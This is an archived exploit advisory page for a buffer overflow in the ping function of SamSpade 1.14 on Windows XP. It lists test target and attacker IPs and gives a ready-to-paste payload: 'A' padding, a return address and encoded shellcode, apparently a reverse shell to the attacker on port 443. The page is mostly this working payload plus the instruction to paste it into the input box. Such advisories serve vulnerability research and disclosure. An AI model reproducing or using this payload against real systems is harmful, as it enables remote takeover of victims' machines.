Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30215
HistoryJan 09, 2014 - 12:00 a.m.

SAMSPADE 1.14 BUFFER OVERFLOW

2014-01-0900:00:00
vulners.com
26
JSON

Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW

Date: 10-12-2013

Exploit Author: VISHAL MISHRA & NIDHI VERMA

Vendor Homepage: http://www.samspade.org/

Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html

Version: 1.1.4 (beta)

Tested on: WINDOWS XP(sp2)

TARGET: windows xp(sp2) ip:192.168.117.129
ATTACKER: backtrack ip:192.168.117.131 PORT:443
Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhMYGpGpEPQpMYM5EaXRE4LKRrP0LKRrVlLKCbEDLKQbQ8TOMgRjEvVQIoVQO0NLElPaQlVbVLQ0IQZoTMC1O7IrL0PRRwLKV2VpNkG2GLGqN0LKQPRXLEIPT4QZEQZpPPNkQXVxNkQHQ0C1ICZCGLQYLKVTNkC1XVTqIoEaO0LlO1XOTMEQXGTxM0CEZTGsQmZXEkQmGTQeIrV8LKChTdC1N3CVNkVlRkLKQHELVaN3LKC4LKC1N0OyRdQ4GTCkQKPaRyPZCaKOKPQHQOCjLKR2ZKMVQMQxEcTrEPEPCXRWRSP2QORtPhRlPwTfTGKOKeMhNpGqGpGpVIITCdRpPhQ9OpPkGpKON5PPRpV0V0CpV0CpRpRHXjVoIOM0IoZuLIIWQxKpOXQeOsPhTBGpC1MkMYM6
QzR0QFCgQxOiLePtCQIoN5QxCSRMPdC0OyKSCgQGQGP1IfQzGbCiV6M2ImE6IWCtVDElVaVaLMQTVDR0O6EPRdV4V0RvPVPVRfCfPNRvPVRsRvQxCIXLEoLFKOIENiM0PNCfG6KOP0CXC8MWEMQpKOKeMkXpX5NBV6QxMvOeOMMMIoZuGLEVQlVjK0IkIpCEGuMkG7VsT2PoQzC0RsIoIEAA
This vulnerability is in ping operation of the software.Just the payload in input box.
VISHAL MISHRA
http://inf0rmati0ns3curity.blogspot.in/
http://instructionpointer.blogspot.in/
http://vishal--mishra.blogspot.in/

JSON